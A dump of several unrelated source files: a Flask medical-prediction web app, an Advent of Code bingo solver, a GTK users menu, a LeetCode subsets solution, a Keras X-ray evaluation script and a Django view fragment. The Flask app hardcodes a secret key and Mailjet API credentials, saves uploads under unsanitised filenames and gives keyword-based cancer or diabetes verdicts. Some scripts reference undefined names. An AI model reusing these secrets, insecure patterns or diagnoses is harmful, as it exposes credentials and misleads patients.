Activation\n#from tensorflow.keras.layers.normalization import BatchNormalization\n#from tensorflow.keras.layers.merge import Concatenate\n#from tensorflow.keras.models import Model\n\nimport os\nfrom flask import send_from_directory\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\nimport tensorflow as tf\n\n#from this import SQLAlchemy\napp=Flask(__name__,template_folder='template')\n\n\n\n# RELATED TO THE SQL DATABASE\napp.config['SECRET_KEY'] = '5791628bb0b13ce0c676dfde280ba245'\n#app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///site.db\"\n#db=SQLAlchemy(app)\n\n#from model import User,Post\n\n#//////////////////////////////////////////////////////////\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n# UPLOAD_FOLDER = dir_path + '/uploads'\n# STATIC_FOLDER = dir_path + '/static'\nUPLOAD_FOLDER = 'uploads'\nSTATIC_FOLDER = 'static'\n\n#graph = tf.get_default_graph()\n#with graph.as_default():;\nfrom tensorflow.keras.models import load_model\nmodel = load_model('model111.h5')\nmodel222=load_model(\"my_model.h5\")\n\n#FOR THE FIRST MODEL\n\n# call model to predict an image\ndef api(full_path):\n data = image.load_img(full_path, target_size=(50, 50, 3))\n data = np.expand_dims(data, axis=0)\n data = data * 1.0 / 255\n\n #with graph.as_default():\n predicted = model.predict(data)\n return predicted\n#FOR THE SECOND MODEL\ndef api1(full_path):\n data = image.load_img(full_path, target_size=(64, 64, 3))\n data = np.expand_dims(data, axis=0)\n data = data * 1.0 / 255\n\n #with graph.as_default():\n predicted = model222.predict(data)\n return predicted\n\n\n# home page\n\n#@app.route('/')\n#def home():\n # return render_template('index.html')\n\n\n# procesing uploaded file and predict it\n@app.route('/upload', methods=['POST','GET'])\ndef upload_file():\n\n if request.method == 'GET':\n return 
render_template('index.html')\n else:\n try:\n file = request.files['image']\n full_name = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(full_name)\n\n indices = {0: 'PARASITIC', 1: 'Uninfected', 2: 'Invasive carcinomar', 3: 'Normal'}\n result = api(full_name)\n print(result)\n\n predicted_class = np.asscalar(np.argmax(result, axis=1))\n accuracy = round(result[0][predicted_class] * 100, 2)\n label = indices[predicted_class]\n return render_template('predict.html', image_file_name = file.filename, label = label, accuracy = accuracy)\n except:\n flash(\"Please select the image first !!\", \"danger\") \n return redirect(url_for(\"Malaria\"))\n\n@app.route('/upload11', methods=['POST','GET'])\ndef upload11_file():\n\n if request.method == 'GET':\n return render_template('index2.html')\n else:\n try:\n file = request.files['image']\n full_name = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(full_name)\n indices = {0: 'Normal', 1: 'Pneumonia'}\n result = api1(full_name)\n if(result>50):\n label= indices[1]\n accuracy= result\n else:\n label= indices[0]\n accuracy= 100-result\n return render_template('predict1.html', image_file_name = file.filename, label = label, accuracy = accuracy)\n except:\n flash(\"Please select the image first !!\", \"danger\") \n return redirect(url_for(\"Pneumonia\"))\n\n\n@app.route('/uploads/')\ndef send_file(filename):\n return send_from_directory(UPLOAD_FOLDER, filename)\n\n\n\n\n\n\n#//////////////////////////////////////////////\n\n#app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///site.db\"\n\n#db=SQLAlchemy(app)\n\n#class User(db.Model):\n## username = db.Column(db.String(20), unique=True, nullable=False)\n # email = db.Column(db.String(120), unique=True, nullable=False)\n #image_file = db.Column(db.String(20), nullable=False, default='default.jpg')\n # password = db.Column(db.String(60), nullable=False)\n #posts = db.relationship('Post', backref='author', lazy=True)\n\n #def __repr__(self):\n # return f\"User('{self.username}', '{self.email}', '{self.image_file}')\"\n\n\n@app.route(\"/\")\n\n@app.route(\"/home\")\ndef home():\n return render_template(\"home.html\")\n \n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/cancer\")\ndef cancer():\n return render_template(\"cancer.html\")\n\n\n@app.route(\"/diabetes\")\ndef diabetes():\n #if form.validate_on_submit():\n return render_template(\"diabetes.html\")\n\n@app.route(\"/heart\")\ndef heart():\n return render_template(\"heart.html\")\n\n\n@app.route(\"/liver\")\ndef liver():\n #if form.validate_on_submit():\n return render_template(\"liver.html\")\n\n@app.route(\"/kidney\")\ndef kidney():\n #if form.validate_on_submit():\n return render_template(\"kidney.html\")\n\n@app.route(\"/Malaria\")\ndef Malaria():\n return render_template(\"index.html\")\n\n@app.route(\"/Pneumonia\")\ndef Pneumonia():\n return render_template(\"index2.html\")\n\n\n\"\"\"\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form =RegistrationForm()\n if form.validate_on_submit():\n #flash(\"Account created for {form.username.data}!\".format(\"success\"))\n flash(\"Account created\",\"success\") \n return redirect(url_for(\"home\"))\n return render_template(\"register.html\", title =\"Register\",form=form )\n@app.route(\"/login\", methods=[\"POST\",\"GET\"])\ndef login():\n form =LoginForm()\n if form.validate_on_submit():\n #if form.email.data ==\"sho\" and form.password.data==\"password\":\n flash(\"You Have Logged in !\",\"success\")\n return 
redirect(url_for(\"home\"))\n #else:\n # flash(\"Login Unsuccessful. Please check username and password\",\"danger\")\n return render_template(\"login.html\", title =\"Login\",form=form )\ndef ValuePredictor1(to_predict_list):\n to_predict = np.array(to_predict_list).reshape(1,30)\n loaded_model = joblib.load(\"model\")\n result = loaded_model.predict(to_predict)\n return result[0]\n \n@app.route('/result1',methods = [\"GET\",\"POST\"])\ndef result():\n if request.method == 'POST':\n to_predict_list = request.form.to_dict()\n to_predict_list=list(to_predict_list.values())\n to_predict_list = list(map(float, to_predict_list))\n result = ValuePredictor(to_predict_list)\n if int(result)==1:\n prediction='cancer'\n else:\n prediction='Healthy' \n return(render_template(\"result.html\", prediction=prediction))\"\"\"\n\n\n\ndef ValuePredictor(to_predict_list, size):\n to_predict = np.array(to_predict_list).reshape(1,size)\n if(size==8):#Diabetes\n loaded_model = joblib.load(\"model1\")\n result = loaded_model.predict(to_predict)\n elif(size==30):#Cancer\n loaded_model = joblib.load(\"model\")\n result = loaded_model.predict(to_predict)\n elif(size==12):#Kidney\n loaded_model = joblib.load(\"model3\")\n result = loaded_model.predict(to_predict)\n elif(size==10):\n loaded_model = joblib.load(\"model4\")\n result = loaded_model.predict(to_predict)\n elif(size==11):#Heart\n loaded_model = joblib.load(\"model2\")\n result =loaded_model.predict(to_predict)\n return result[0]\n\n@app.route('/result',methods = [\"POST\"])\ndef result():\n result = 0\n if request.method == 'POST':\n to_predict_list = request.form.to_dict()\n to_predict_list=list(to_predict_list.values())\n to_predict_list = list(map(float, to_predict_list))\n if(len(to_predict_list)==30):#Cancer\n result = ValuePredictor(to_predict_list,30)\n elif(len(to_predict_list)==8):#Daiabtes\n result = ValuePredictor(to_predict_list,8)\n elif(len(to_predict_list)==12):\n result = ValuePredictor(to_predict_list,12)\n elif(len(to_predict_list)==11):\n result = ValuePredictor(to_predict_list,11)\n #if int(result)==1:\n # prediction ='diabetes'\n #else:\n # prediction='Healthy' \n elif(len(to_predict_list)==10):\n result = ValuePredictor(to_predict_list,10)\n if(int(result)==1):\n prediction='Sorry ! Suffering'\n else:\n prediction='Congrats ! 
you are Healthy'\n send_mail(msg=prediction)\n return(render_template(\"result.html\", prediction=prediction))\n\n@app.route(\"/checkup\", methods = [\"GET\", \"POST\"])\ndef diagnose():\n symptoms = []\n mail = ''\n name = ''\n if request.method == 'POST':\n to_predict_list = request.form.to_dict()\n print(to_predict_list)\n to_predict_list=list(to_predict_list.values())\n name = to_predict_list[0]\n mail = to_predict_list[1]\n symptoms = request.form.getlist('symptoms')\n print(symptoms)\n prediction = diagnose_disease(symptoms=symptoms)\n send_mail(mail=mail, name=name, msg=prediction)\n return(render_template(\"checkup.html\", prediction=prediction))\n\ndef send_mail(mail='chanchalsoni0722@gmail.com', name='test', msg='test message'):\n from mailjet_rest import Client\n import os\n api_key = 'b23e7953200c5b2563f30245220af99f'\n api_secret = '6d34ef6f4f14ed4c1cb81cb15d5e8b29'\n mailjet = Client(auth=(api_key, api_secret), version='v3.1')\n data = {\n 'Messages': [\n {\n \"From\": {\n \"Email\": \"chanchalsoni0722@gmail.com\",\n \"Name\": \"Smart Healthcare\"\n },\n \"To\": [\n {\n \"Email\": mail,\n \"Name\": name\n }\n ],\n \"Subject\": \"Greetings from Smart Healthcare.\",\n \"TextPart\": \"Health Report\",\n \"HTMLPart\": f\"
Dear {name}, hope you and your family are healthy and happy. {msg} After this report, please don't forget to consult a doctor.
May god bless you!\",\n \"CustomID\": \"Smart Healthcare\"\n }\n ]\n }\n result = mailjet.send.create(data=data)\n print(result.status_code)\n print(result.json())\n\n\ndef diagnose_disease(symptoms):\n cancer = ['bloating', 'pelvic pain', 'abdominal pain', 'difficulty eating', 'feeling full quickly', 'urinary urgency']\n diabetes = ['urinate', 'blurry vision', 'very tired', 'dry skin', 'very hungry']\n flu = ['fever', 'running nose', 'headache', 'bodyache', 'ache', 'pain']\n\n cancer_pts = 0\n flu_pts = 0\n diabetes_pts = 0\n\n for s in symptoms:\n cancer_pts = cancer_pts + cancer.count(s)\n flu_pts = flu_pts + flu.count(s)\n diabetes_pts = diabetes_pts + diabetes.count(s)\n\n if cancer_pts > flu_pts and cancer_pts > diabetes_pts:\n return 'You may suffer from cancer. Please go check for cancer test.'\n elif flu_pts > cancer_pts and flu_pts > diabetes_pts:\n return 'You may suffer from flu. Yo don\\'t need any test. Just need to consult a doctor.'\n else:\n return 'You may suffer from diabetes. Please go check for diabetes test.'\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"soni-chanchal/AI-ML-Medical-Technology","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40150432752","text":"import re\n\nclass BingoCard:\n \n def __init__(self, numbers):\n self.numbers = numbers.copy()\n self.marked = [[False]*5 for _ in range(5)]\n \n def __repr__(self):\n return '\\n'.join([' '.join([str(number) for number in line]) for line in self.numbers])\n \n def mark(self, mark_number):\n for line_number, line in enumerate(self.numbers):\n for index, number in enumerate(line):\n if number == mark_number:\n self.marked[line_number][index] = True\n return\n \n def is_bingo(self):\n for i in range(5):\n if all(self.marked[i]) or all(self.marked[j][i] for j in range(5)):\n return True\n return False\n\n \n def score(self, drawn_number):\n unmarked_sum = 0\n for i in range(5):\n for j in range(5):\n unmarked_sum += self.numbers[i][j] if not self.marked[i][j] else 0\n return unmarked_sum * drawn_number\n\ncards = []\nr = r'([0-9]+[ ]*)'\nwith open('input/day4.txt', 'r', encoding='utf8') as file:\n drawn_numbers = [int(number) for number in file.readline().split(',')]\n file.readline() # skip line\n numbers = []\n for line in file:\n if line == '\\n':\n cards.append(BingoCard(numbers))\n numbers = []\n else:\n numbers.append([int(m.strip()) for m in re.findall(r,line)])\n cards.append(BingoCard(numbers))\n\n# Part 1\nfor drawn_number in drawn_numbers:\n for card in cards:\n card.mark(drawn_number)\n winners = [card for card in cards if card.is_bingo()]\n if winners:\n winner = winners[0]\n print(winner.score(drawn_number))\n break\n\n# Part 2\nfor drawn_number in drawn_numbers:\n drawn_number = int(drawn_number)\n for card in cards:\n card.mark(drawn_number)\n if len(cards) == 1:\n last_card = cards[0]\n cards = [card for card in cards if not card.is_bingo()]\n if len(cards) == 0:\n print(last_card.score(drawn_number))\n break","repo_name":"andrew-paul-thompson/advent-of-code-2021","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21370571602","text":"import gi\ngi.require_version('Gtk', '4.0')\nfrom gi.repository import Gtk\n\nfrom .Config import Config\nfrom .Users import Users\nfrom .MainWindow import 
MainWindow\nfrom . import Common\n\n_tr = Config._tr\n\n\nclass UsersMenu:\n\n def __init__(self):\n\n self.menu_gui()\n\n\n def menu_gui(self):\n \"\"\"\n Generate menu GUI.\n \"\"\"\n\n # Popover\n self.menu_po = Gtk.Popover()\n\n # Grid (main)\n main_grid = Common.menu_main_grid()\n self.menu_po.set_child(main_grid)\n\n # Label - menu title (Users)\n label = Common.menu_title_label(_tr(\"Users\"))\n main_grid.attach(label, 0, 0, 1, 1)\n\n # Notebook\n notebook = Gtk.Notebook()\n notebook.set_hexpand(True)\n notebook.set_vexpand(True)\n main_grid.attach(notebook, 0, 1, 1, 1)\n\n # Tab pages and ScrolledWindow\n # \"Add/Remove Columns\" tab\n label = Gtk.Label()\n label.set_label(_tr(\"Add/Remove Columns\"))\n self.grid_add_remove_columns_tab = Gtk.Grid()\n self.grid_add_remove_columns_tab.set_margin_top(15)\n self.grid_add_remove_columns_tab.set_margin_bottom(5)\n self.grid_add_remove_columns_tab.set_margin_start(5)\n self.grid_add_remove_columns_tab.set_margin_end(5)\n self.grid_add_remove_columns_tab.set_row_spacing(5)\n notebook.append_page(self.grid_add_remove_columns_tab, label)\n\n # Button (Reset)\n self.reset_button = Common.reset_button()\n main_grid.attach(self.reset_button, 0, 2, 1, 1)\n\n # \"Add/Remove Columns\" tab GUI\n self.add_remove_columns_tab_gui()\n\n # GUI signals\n self.gui_signals()\n\n\n def add_remove_columns_tab_gui(self):\n \"\"\"\n Generate \"Add/Remove Columns\" tab GUI objects.\n \"\"\"\n\n # Grid\n grid = Gtk.Grid()\n grid.set_margin_top(5)\n grid.set_margin_bottom(5)\n grid.set_margin_start(5)\n grid.set_margin_end(5)\n grid.set_column_spacing(10)\n grid.set_row_spacing(3)\n self.grid_add_remove_columns_tab.attach(grid, 0, 0, 1, 1)\n\n # Label - tab title (Add/Remove Columns)\n label = Common.title_label(_tr(\"Add/Remove Columns\"))\n grid.attach(label, 0, 0, 2, 1)\n\n # CheckButton (User)\n self.user_cb = Common.checkbutton(_tr(\"User\"), None)\n self.user_cb.set_active(True)\n self.user_cb.set_sensitive(False)\n grid.attach(self.user_cb, 0, 1, 1, 1)\n\n # CheckButton (Full Name)\n self.full_name_cb = Common.checkbutton(_tr(\"Full Name\"), None)\n grid.attach(self.full_name_cb, 0, 2, 1, 1)\n\n # CheckButton (Logged In)\n self.logged_in_cb = Common.checkbutton(_tr(\"Logged In\"), None)\n grid.attach(self.logged_in_cb, 0, 3, 1, 1)\n\n # CheckButton (UID)\n self.uid_cb = Common.checkbutton(_tr(\"UID\"), None)\n grid.attach(self.uid_cb, 0, 4, 1, 1)\n\n # CheckButton (GID)\n self.gid_cb = Common.checkbutton(_tr(\"GID\"), None)\n grid.attach(self.gid_cb, 0, 5, 1, 1)\n\n # CheckButton (Processes)\n self.processes_cb = Common.checkbutton(_tr(\"Processes\"), None)\n grid.attach(self.processes_cb, 0, 6, 1, 1)\n\n # CheckButton (Home Directory)\n self.home_directory_cb = Common.checkbutton(_tr(\"Home Directory\"), None)\n grid.attach(self.home_directory_cb, 1, 1, 1, 1)\n\n # CheckButton (Group)\n self.group_cb = Common.checkbutton(_tr(\"Group\"), None)\n grid.attach(self.group_cb, 1, 2, 1, 1)\n\n # CheckButton (Terminal)\n self.terminal_cb = Common.checkbutton(_tr(\"Terminal\"), None)\n grid.attach(self.terminal_cb, 1, 3, 1, 1)\n\n # CheckButton (Start Time)\n self.start_time_cb = Common.checkbutton(_tr(\"Start Time\"), None)\n grid.attach(self.start_time_cb, 1, 4, 1, 1)\n\n # CheckButton (CPU)\n self.cpu_cb = Common.checkbutton(_tr(\"CPU\"), None)\n grid.attach(self.cpu_cb, 1, 5, 1, 1)\n\n\n def gui_signals(self):\n \"\"\"\n Connect GUI signals.\n \"\"\"\n\n self.menu_po.connect(\"show\", self.on_menu_po_show)\n self.reset_button.connect(\"clicked\", 
self.on_reset_button_clicked)\n\n\n def connect_signals(self):\n \"\"\"\n Connect some of the signals to be able to disconnect them for setting GUI.\n \"\"\"\n\n self.user_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.full_name_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.logged_in_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.uid_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.gid_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.processes_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.home_directory_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.group_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.terminal_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.start_time_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.cpu_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n\n\n def disconnect_signals(self):\n \"\"\"\n Disconnect some of the signals for setting GUI.\n \"\"\"\n\n self.user_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.full_name_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.logged_in_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.uid_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.gid_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.processes_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.home_directory_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.group_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.terminal_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.start_time_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.cpu_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n\n\n def on_menu_po_show(self, widget):\n \"\"\"\n Run code when customizations menu popover is shown.\n \"\"\"\n \n try:\n self.disconnect_signals()\n except TypeError:\n pass\n self.set_gui()\n self.connect_signals()\n\n\n def on_reset_button_clicked(self, widget):\n \"\"\"\n Reset customizations.\n \"\"\"\n\n # Load default settings\n Config.config_default_users_func()\n Config.config_save_func()\n\n Common.update_tab_and_menu_gui(self, Users)\n\n\n def on_add_remove_checkbuttons_toggled(self, widget):\n \"\"\"\n Run a function for adding/removing columns to treeview.\n \"\"\"\n\n self.add_remove_columns()\n\n\n def set_gui(self):\n \"\"\"\n Set GUI items.\n \"\"\"\n\n # Set GUI objects on Add/Remove Column tab\n if 0 in Config.users_treeview_columns_shown:\n self.user_cb.set_active(True)\n else:\n self.user_cb.set_active(False)\n if 1 in Config.users_treeview_columns_shown:\n self.full_name_cb.set_active(True)\n else:\n self.full_name_cb.set_active(False)\n if 2 in Config.users_treeview_columns_shown:\n self.logged_in_cb.set_active(True)\n else:\n self.logged_in_cb.set_active(False)\n if 3 in Config.users_treeview_columns_shown:\n self.uid_cb.set_active(True)\n else:\n self.uid_cb.set_active(False)\n if 4 in Config.users_treeview_columns_shown:\n self.gid_cb.set_active(True)\n else:\n self.gid_cb.set_active(False)\n if 5 in Config.users_treeview_columns_shown:\n self.processes_cb.set_active(True)\n else:\n self.processes_cb.set_active(False)\n if 6 in Config.users_treeview_columns_shown:\n 
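            # (each if/else pair below mirrors one column flag from
            # Config.users_treeview_columns_shown into its checkbutton; a
            # table-driven loop over (column_index, checkbutton) pairs could
            # replace the repetition)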
self.home_directory_cb.set_active(True)\n        else:\n            self.home_directory_cb.set_active(False)\n        if 7 in Config.users_treeview_columns_shown:\n            self.group_cb.set_active(True)\n        else:\n            self.group_cb.set_active(False)\n        if 8 in Config.users_treeview_columns_shown:\n            self.terminal_cb.set_active(True)\n        else:\n            self.terminal_cb.set_active(False)\n        if 9 in Config.users_treeview_columns_shown:\n            self.start_time_cb.set_active(True)\n        else:\n            self.start_time_cb.set_active(False)\n        if 10 in Config.users_treeview_columns_shown:\n            self.cpu_cb.set_active(True)\n        else:\n            self.cpu_cb.set_active(False)\n\n\n    def add_remove_columns(self):\n        \"\"\"\n        Add/Remove columns to treeview.\n        \"\"\"\n\n        Config.users_treeview_columns_shown = []\n\n        if self.user_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(0)\n        if self.full_name_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(1)\n        if self.logged_in_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(2)\n        if self.uid_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(3)\n        if self.gid_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(4)\n        if self.processes_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(5)\n        if self.home_directory_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(6)\n        if self.group_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(7)\n        if self.terminal_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(8)\n        if self.start_time_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(9)\n        if self.cpu_cb.get_active() == True:\n            Config.users_treeview_columns_shown.append(10)\n\n        # Apply changes immediately (without waiting update interval).\n        Common.treeview_column_order_width_row_sorting(None, None, Users)\n\n        Common.save_tab_settings(Users)\n\n\nUsersMenu = UsersMenu()\n\n","repo_name":"hakandundar34coding/system-monitoring-center","sub_path":"src/UsersMenu.py","file_name":"UsersMenu.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","stars":849,"dataset":"github-code","pt":"48"}
{"seq_id":"44268432642","text":"# Subsets. The key idea: at every recursive step, build the subsets of the array without its last element, then duplicate all of those results: one copy gets the new last element appended, the other copy stays unchanged.\n# Finally, add the empty set.\nclass Solution(object):\n    def subsets(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        import copy\n        result = self.func(nums)\n        return result+[[]]\n\n    def func(self,nums):\n        if len(nums)<=1:\n            return [nums]\n        \n        now = nums[-1]\n        pre = self.func(nums[:len(nums)-1])\n        pre_now = copy.deepcopy(pre)\n        for i in pre_now:\n            i += [now]\n        return pre+pre_now+[[now]]","repo_name":"whywhs/Leetcode","sub_path":"Leetcode78_M.py","file_name":"Leetcode78_M.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25066069386","text":"from __future__ import absolute_import, division, print_function\n\nfrom os import environ, getcwd\nfrom os.path import join\n\nimport shutil\nimport re\nimport os\nimport argparse\nimport keras\nimport numpy as np\nimport pandas as pd\nimport sklearn as skl\nimport tensorflow as tf\nfrom keras.applications.vgg19 import VGG19\nfrom keras.applications import DenseNet169, InceptionResNetV2, DenseNet201\nfrom keras.applications import NASNetMobile\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.metrics import binary_accuracy, binary_crossentropy, kappa_error\nfrom 
keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom custom_layers import *\nfrom mura import Mura\n\npd.set_option('display.max_rows', 20)\npd.set_option('precision', 4)\nnp.set_printoptions(precision=4)\n\nenviron['TF_CPP_MIN_LOG_LEVEL'] = '2' # Shut up tensorflow!\nprint(\"tf : {}\".format(tf.__version__))\nprint(\"keras : {}\".format(keras.__version__))\nprint(\"numpy : {}\".format(np.__version__))\nprint(\"pandas : {}\".format(pd.__version__))\nprint(\"sklearn : {}\".format(skl.__version__))\n\n# Hyper-parameters / Globals\nBATCH_SIZE = 4 # tweak to your GPUs capacity\nIMG_HEIGHT = 420 # ResNetInceptionv2 & Xception like 299, ResNet50/VGG/Inception 224, NASM 331\nIMG_WIDTH = IMG_HEIGHT\nCHANNELS = 3\nDIMS = (IMG_HEIGHT, IMG_WIDTH, CHANNELS) # blame theano\nMODEL_TO_EVAL1 = './models/DenseNet169_420_HUMERUS.hdf5'\nMODEL_TO_EVAL2 = './models/DenseNet169_420_HAND.hdf5'\nMODEL_TO_EVAL3 = './models/DenseNet169_420_FINGER.hdf5'\nMODEL_TO_EVAL4 = './models/DenseNet169_420_FOREARM.hdf5'\nMODEL_TO_EVAL5 = './models/DenseNet169_420_ELBOW.hdf5'\nMODEL_TO_EVAL6 = './models/DenseNet169_420_SHOULDER.hdf5'\nMODEL_TO_EVAL7 = './models/DenseNet169_420_WRIST.hdf5'\nMODEL_TO_EVAL8 = './models/DenseNet169_420_NEW_HIST.hdf5'\nDATA_DIR = 'data_val/'\nEVAL_CSV = 'valid.csv'\nEVAL_DIR = 'data/val/'\n\nparser = argparse.ArgumentParser(description='Input Path')\nparser.add_argument('input_filename',default='valid_image_paths.csv', type=str)\nparser.add_argument('output_path', default='prediction.csv', type=str)\nproc_data_dir = join(os.getcwd(), 'data/val/')\nproc_train_dir = join(proc_data_dir, 'train')\nproc_val_dir = join(proc_data_dir, 'val')\n\n\nclass ImageString(object):\n _patient_re = re.compile(r'patient(\\d+)')\n _study_re = re.compile(r'study(\\d+)')\n _image_re = re.compile(r'image(\\d+)')\n _study_type_re = re.compile(r'XR_(\\w+)')\n\n def __init__(self, img_filename):\n\n self.img_filename = img_filename\n self.patient = self._parse_patient()\n self.study = self._parse_study()\n self.image_num = self._parse_image()\n self.study_type = self._parse_study_type()\n self.image = self._parse_image()\n self.normal = self._parse_normal()\n self.valid = self._parse_valid()\n\n\n def flat_file_name(self):\n return \"{}_{}_patient{}_study{}_{}_image{}.png\".format(self.valid, self.study_type, self.patient, self.study,\n self.normal, self.image)\n\n def _parse_patient(self):\n return int(self._patient_re.search(self.img_filename).group(1))\n\n def _parse_study(self):\n return int(self._study_re.search(self.img_filename).group(1))\n\n def _parse_image(self):\n return int(self._image_re.search(self.img_filename).group(1))\n\n def _parse_study_type(self):\n return self._study_type_re.search(self.img_filename).group(1)\n\n def _parse_normal(self):\n return \"normal\" if (\"negative\" in self.img_filename) else \"abnormal\"\n\n def _parse_normal_label(self):\n return 1 if(\"negative\" in self.img_filename) else 0\n\n def _parse_valid(self):\n return \"valid\" if (\"valid\" in self.img_filename) else \"test\"\n\ndef preprocess_img(img):\n # Histogram normalization in v channel\n hsv = color.rgb2hsv(img)\n hsv[:, :, 2] = exposure.equalize_hist(hsv[:, :, 2])\n img = color.hsv2rgb(hsv)\n\n # central square crop\n min_side = min(img.shape[:-1])\n centre = img.shape[0] // 2, img.shape[1] // 2\n img = img[centre[0] - min_side // 2:centre[0] + min_side // 2,\n centre[1] - min_side // 2:centre[1] + min_side // 2,\n :]\n\n # rescale to standard size\n 
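    # NOTE: color, exposure and transform used in preprocess_img are scikit-image
    # modules, and IMG_SIZE is not defined in this file (only IMG_HEIGHT/IMG_WIDTH
    # are); the code appears to assume something like
    # `from skimage import color, exposure, transform` plus IMG_SIZE = IMG_HEIGHT.
    # Likewise, kappa_error is not a standard keras.metrics member and is
    # presumably provided by the custom_layers import above.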
img = transform.resize(img, (IMG_SIZE, IMG_SIZE))\n\n # roll color axis to axis 0\n img = np.rollaxis(img, -1)\n\n return img\n\ndef eval(args=None):\n\n args= parser.parse_args()\n\n # load up our csv with validation factors\n data_dir = join(getcwd(), DATA_DIR)\n eval_csv = join(data_dir, EVAL_CSV)\n\n true_labels=[]\n\n ###########################################\n df = pd.read_csv(args.input_filename, names=['img', 'label'], header=None)\n samples = [tuple(x) for x in df.values]\n # for img, label in samples:\n # #assert (\"negative\" in img) is (label is 0)\n # enc = ImageString(img)\n # true_labels.append(enc._parse_normal_label())\n # cat_dir = join(proc_val_dir, enc.normal)\n # if not os.path.exists(cat_dir):\n # os.makedirs(cat_dir)\n # shutil.copy2(enc.img_filename, join(cat_dir, enc.flat_file_name()))\n\n\n ###########################################\n\n eval_datagen = ImageDataGenerator(rescale=1./255\n# , histogram_equalization=True\n )\n eval_generator = eval_datagen.flow_from_directory(\n EVAL_DIR, class_mode='binary', shuffle=False,target_size=(IMG_HEIGHT, IMG_WIDTH), batch_size=BATCH_SIZE)\n n_samples = eval_generator.samples\n base_model = DenseNet169(input_shape=DIMS, weights='imagenet', include_top=False) #weights='imagenet'\n x = base_model.output\n x = GlobalAveragePooling2D(name='avg_pool')(x) # comment for RESNET\n # x = WildcatPool2d()(x)\n\n x = Dense(1, activation='sigmoid', name='predictions')(x)\n model = Model(inputs=base_model.input, outputs=x)\n model.load_weights(MODEL_TO_EVAL8)\n model.compile(optimizer=Adam(lr=1e-3)\n , loss=binary_crossentropy\n# , loss=kappa_error\n , metrics=['binary_accuracy'])\n score, acc = model.evaluate_generator(eval_generator, n_samples / BATCH_SIZE)\n print(model.metrics_names)\n print('==> Metrics with eval')\n print(\"loss :{:0.4f} \\t Accuracy:{:0.4f}\".format(score, acc))\n y_pred = model.predict_generator(eval_generator, n_samples / BATCH_SIZE)\n\n# print(y_pred)\n# df_filenames = pd.Series(np.array(eval_generator.filenames), name='filenames')\n# df_classes = pd.Series(np.array(y_pred), name='classes')\n\n# prediction_data = pd.concat([df_filenames, df_classes,])\n# prediction_data.to_csv(args.output_path + \"/prediction.csv\")\n\n mura = Mura(eval_generator.filenames, y_true = eval_generator.classes, y_pred1=y_pred, y_pred2=y_pred, y_pred3=y_pred, y_pred4= y_pred, y_pred5= y_pred, output_path= args.output_path)\n print(mura.metrics_by_encounter())\n\n\nif __name__ == '__main__':\n eval()\n","repo_name":"ynswon/MURA","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28718153267","text":"from django.core.urlresolvers import reverse_lazy\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom .models import InfusionsoftProfile, UserProfile, UserPrivateProfile\nfrom .forms import UserProfileForm, UserPrivateProfileForm\n\n\n@login_required\ndef update_infusionsoft_tags(request):\n '''\n updates users 